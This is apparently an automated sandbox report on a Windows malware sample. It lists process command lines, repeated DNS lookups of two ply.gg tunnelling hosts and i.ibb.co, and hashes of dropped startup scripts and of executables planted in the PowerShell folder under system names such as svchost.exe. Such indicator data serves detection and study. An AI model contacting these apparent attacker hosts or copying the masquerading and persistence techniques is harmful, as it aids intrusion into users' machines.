"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
C:\Windows\system32\msdt.exe
-modal "197078" -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\Admin\AppData\Local\Temp\NDFFDA9.tmp" -ep "NetworkDiagnosticsWeb"
C:\Windows\System32\sdiagnhost.exe
C:\Windows\System32\sdiagnhost.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s WdiSystemHost
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\winethc.dll",ForceProxyDetectionOnNextRun
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultbcd1a1cfhd411h4ae1h9fe3h3354cdb4a53e
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fffec2046f8,0x7fffec204708,0x7fffec204718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1430714184297952503,12384781248704128857,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,1430714184297952503,12384781248704128857,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.4.4:53 | google.com | udp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | 193.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
Files
memory/2652-0-0x00007FFFEFE53000-0x00007FFFEFE55000-memory.dmp
memory/2652-6-0x000001A8E25B0000-0x000001A8E25D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5tgvqcjs.ab4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2652-11-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp
memory/2652-12-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp
memory/2652-13-0x000001A8E27C0000-0x000001A8E2804000-memory.dmp
memory/2652-14-0x000001A8E2A30000-0x000001A8E2AA6000-memory.dmp
memory/2652-15-0x000001A8E2600000-0x000001A8E2608000-memory.dmp
memory/2652-16-0x000001A8E2AB0000-0x000001A8E2B8C000-memory.dmp
memory/2736-27-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp
memory/2736-28-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp
memory/2736-29-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp
memory/2736-32-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 661739d384d9dfd807a089721202900b |
| SHA1 | 5b2c5d6a7122b4ce849dc98e79a7713038feac55 |
| SHA256 | 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf |
| SHA512 | 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8 |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.vbs
| MD5 | ea54fc2cffa9e8e97b71383f1b5352fa |
| SHA1 | cd694823076fed240ae0377fa748ccc1f537fae9 |
| SHA256 | f73070cc5832787d34a3f77f719bcb59370b7f18f25358fcc39fd64cb96c7f95 |
| SHA512 | 095b4c02ba8a0118e7524a96409f11bf7706d8bba52a6ff688ee0110351d34e737e720f5aa6d36cff8982fc0634175de7beeece43db9457858010a48d094c251 |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.bat
| MD5 | 1897b3980473ad054ab05b0f2ced4de7 |
| SHA1 | a694b444dc8dd30e07f69671c3905ffb6fe13532 |
| SHA256 | 3d25b09ab5a16a6b49a7394175b3bce37ba2ae9ce8771408b05280b1bd14b036 |
| SHA512 | 6f67fe1aca76aa0ff33ebf7f1edc4bae6b25c34c543ffa8f59220e520dea91fe92bd50681a5d3086353ef245bd28887bca93efa276ad2544dfbdbdd188ba5ee1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 005bc2ef5a9d890fb2297be6a36f01c2 |
| SHA1 | 0c52adee1316c54b0bfdc510c0963196e7ebb430 |
| SHA256 | 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d |
| SHA512 | f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22 |
memory/2652-50-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmp
memory/3488-51-0x0000000003270000-0x000000000329A000-memory.dmp
memory/3488-98-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/1372-100-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/1788-110-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/2056-114-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/2056-113-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/1788-109-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/1968-108-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/1968-107-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/1660-106-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/1660-105-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/2560-104-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/2560-103-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/896-102-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/896-101-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/1736-112-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp
memory/1736-111-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/1372-99-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/3488-97-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmp
memory/620-189-0x0000019827810000-0x00000198278B4000-memory.dmp
C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe
| MD5 | e10c7425705b2bd3214fa96247ee21c4 |
| SHA1 | 7603536b97ab6337fa023bafcf80579c2b4059e6 |
| SHA256 | 021068ac225e479b124c33d9e7582c17fdea6e625b165b79e2c818479d8094e4 |
| SHA512 | 47e031992d637fef2a67e4fb08d2d82eaba03eba6b80f3e0e0997153acf0d979d0294276c4a10a97daa50130540230865c56191e6fe8df07dbea11c50fa48a2d |
C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe
| MD5 | 092a0c6fe885844fd74947e64e7fc11e |
| SHA1 | bfe46f64f36f2e927d862a1a787f146ed2c01219 |
| SHA256 | 91431cb73305e0f1fdc698907301b6d312a350f667c50765615672e7f10a68f2 |
| SHA512 | 022589bd17b46e5486971a59b2517956bb15815266e48dc73a7ae9ac9efd42a348af09df471562eb71ffc94ce1e1845d54ca2994663d1496a385bce50ae595f0 |
C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe
| MD5 | 27fe9341167a34f606b800303ac54b1f |
| SHA1 | 86373d218b48361bff1c23ddd08b6ab1803a51d0 |
| SHA256 | 29e13a91af9b0ac77e9b7f8b0c26e5702f46bd8aea0333ca2d191d1d09c70c5d |
| SHA512 | 05b83ad544862d9c0cfc2651b2842624cff59fc4f454e0b1a2b36a705b558fad5a834f9f1af9f2626c57f1e3cd9aa400e290eaafb6efeb680422992bcbbde5b0 |
memory/4996-219-0x0000000000DE0000-0x0000000000DF8000-memory.dmp
memory/4332-225-0x0000000000800000-0x0000000000816000-memory.dmp
C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe
| MD5 | 1f1b23752df3d29e7604ba52aea85862 |
| SHA1 | bb582c6cf022098b171c4c9c7318a51de29ebcf4 |
| SHA256 | 4834d31394f19d42e8d2a035b4c3c9c36441340ea19fe766396848ecfb608960 |
| SHA512 | d52722ab73bb15d4a5b0033351f98f168192f382677e6d474f6cf506cf8dc2f5e421e45279b6cac0f074857f41a865d87b5d989450bfcb8eba925b7baa12fbde |
memory/2360-237-0x00000000007A0000-0x00000000007BA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4158365912175436289496136e7912c2 |
| SHA1 | 813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59 |
| SHA256 | 354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1 |
| SHA512 | 74b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b |
\??\pipe\LOCAL\crashpad_2340_PULPCHEOHDMFVBUS
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ce4c898f8fc7601e2fbc252fdadb5115 |
| SHA1 | 01bf06badc5da353e539c7c07527d30dccc55a91 |
| SHA256 | bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa |
| SHA512 | 80fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 24a1b8cbcd8c68c91c2cdedec7989966 |
| SHA1 | 2d65b0266699c1ba4f0cc0cb2b3a71c1031b9de0 |
| SHA256 | 5cafbd0285d32183dc26dd3c6b2cd1abecb2394aeed9343622cabefe8ebdb79c |
| SHA512 | b489719003c6d2956dc4ef7a8355747abbb05900d8e903f5e4c76f98acdf38f3421bc10fe96e2a684830c74d8958004245e2dc61a5a3631786ce4fafc4a202f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
